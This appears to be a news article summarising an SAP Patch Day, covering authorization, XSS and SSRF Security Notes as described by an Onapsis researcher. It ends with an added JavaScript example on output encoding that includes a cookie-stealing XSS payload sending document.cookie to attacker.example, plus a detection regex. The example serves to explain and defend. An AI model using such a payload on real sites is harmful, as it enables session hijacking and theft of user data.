SAP, the German multinational software company, develops enterprise software to manage business operations and customer relations. The company has a large reach, being the world’s leading enterprise resource planning (ERP) software vendor.
This means that any security update from SAP draws significant interest from the IT departments of many businesses. With the latest round of security patches, SAP has released eighteen new and updated SAP Security Notes, including two so-called ‘High Priority Notes’.
How effective will these updates be? SAP security researcher Thomas Fritsch of Onapsis expects them to be, and his work with Onapsis Research Labs (ORL) directly contributed to SAP’s Patch Day, which patches twelve vulnerabilities covered by the ten new SAP Security Notes.
Fritsch has explained what each of these updates means.
SAP Security Note #3483344, tagged with a CVSS score of 7.7
Fritsch says that this is the most critical patch by CVSS rating. Onapsis Research Labs (ORL) detected a Missing Authorization Check vulnerability in SAP Product Design Cost Estimating (SAP PDCE), which is based on SAP Strategic Enterprise Management (SEM). A remote-enabled function module in SAP PDCE lets a remote attacker read generic table data, which puts the system’s confidentiality at high risk. The patch disables the vulnerable function module.
SAP Security Note #3490515, tagged with a CVSS score of 7.2
Fritsch explains that this note addresses an Improper Authorization Check vulnerability in SAP Commerce (On Premise and Public Cloud). An attacker can misuse the forgotten-password functionality to gain access to a site for which early login and registration are activated, without the merchant having to approve the account beforehand. If the site is not configured as an isolated site, this can also grant access to other non-isolated early-login sites, even if registration is not enabled for those other sites.
SAP rates the possible impact of this vulnerability on the application’s confidentiality and integrity as Low and sees no impact on its availability. As a temporary workaround, SAP recommends disabling registration for affected isolated Composable Storefront B2B sites, and for all non-isolated Composable Storefront B2B sites if Early Login is enabled on at least one of those non-isolated sites.
SAP Security Note #3482217 patches a Reflected XSS vulnerability (CVSS score 6.1) and a Stored XSS vulnerability (CVSS score 5.4) in SAP BW Business Planning and Simulation.
Fritsch says both have a low impact on the application’s confidentiality and integrity and no impact on its availability.
SAP Security Note #3468681, tagged with a CVSS score of 6.1, addresses the XMLEditor in SAP NetWeaver Knowledge Management.
Due to insufficient encoding of user-controlled input, the XMLEditor allows malicious scripts to be executed in the application, according to Fritsch.
SAP Security Note #3467377 is a collective note for SAP CRM (WebClient UI), patching four vulnerabilities in total.
For this note, Fritsch outlines that besides two Reflected XSS vulnerabilities, each tagged with a CVSS score of 6.1, it also fixes a Server-Side Request Forgery vulnerability (CVSS score 5.0) and a Missing Authorization Check vulnerability (CVSS score 4.3).
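The XSS findings in Notes #3482217, #3468681 and #3467377 share the root cause Fritsch names for the XMLEditor: user-controlled input reaches the rendered page without encoding. The JavaScript below is an added illustration of that failure and its fix; it is not code from SAP, Onapsis or any of the affected products. The renderNodeNameUnsafe/renderNodeNameSafe functions, the escapeHtml helper, the containsExecutableMarkup detector, the constructed payload and the attacker.example host are all hypothetical.

```javascript
// Added example (not SAP or Onapsis code): how "insufficient encoding of
// user-controlled input" turns into script execution, and what fixes it.

// Minimal HTML encoder for the characters that matter in element content
// and in double- or single-quoted attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')   // must run first so later entities are not double-encoded
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Vulnerable rendering (hypothetical): a user-supplied node name is
// concatenated straight into markup. Whatever the user typed becomes HTML.
function renderNodeNameUnsafe(name) {
  return `<span class="node">${name}</span>`;
}

// Hardened rendering: the same template, with the input encoded for the
// HTML element context it is placed in.
function renderNodeNameSafe(name) {
  return `<span class="node">${escapeHtml(name)}</span>`;
}

// Crude check used only in this example: would a browser find a script tag
// or an inline event-handler attribute in this markup?
function containsExecutableMarkup(html) {
  return /<script\b/i.test(html) || /\son\w+\s*=/i.test(html);
}

// Constructed payload of the kind submitted in a reflected XSS test.
// In the stored variant the same string is saved once and rendered to
// every later viewer, which is why stored XSS affects many sessions.
const PAYLOAD =
  '<script>document.location="https://attacker.example/?c="+document.cookie</script>';

function demo() {
  return {
    unsafe: renderNodeNameUnsafe(PAYLOAD),
    safe: renderNodeNameSafe(PAYLOAD),
  };
}

const out = demo();
console.log('unsafe executable:', containsExecutableMarkup(out.unsafe));
console.log('safe executable:  ', containsExecutableMarkup(out.safe));
```

The encoding has to match the output context: escapeHtml is correct for element content and quoted attribute values, but data placed inside a script block, a URL or a CSS value needs a different encoder, so a single global escape function is not a complete fix for every sink a product like the XMLEditor may have.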
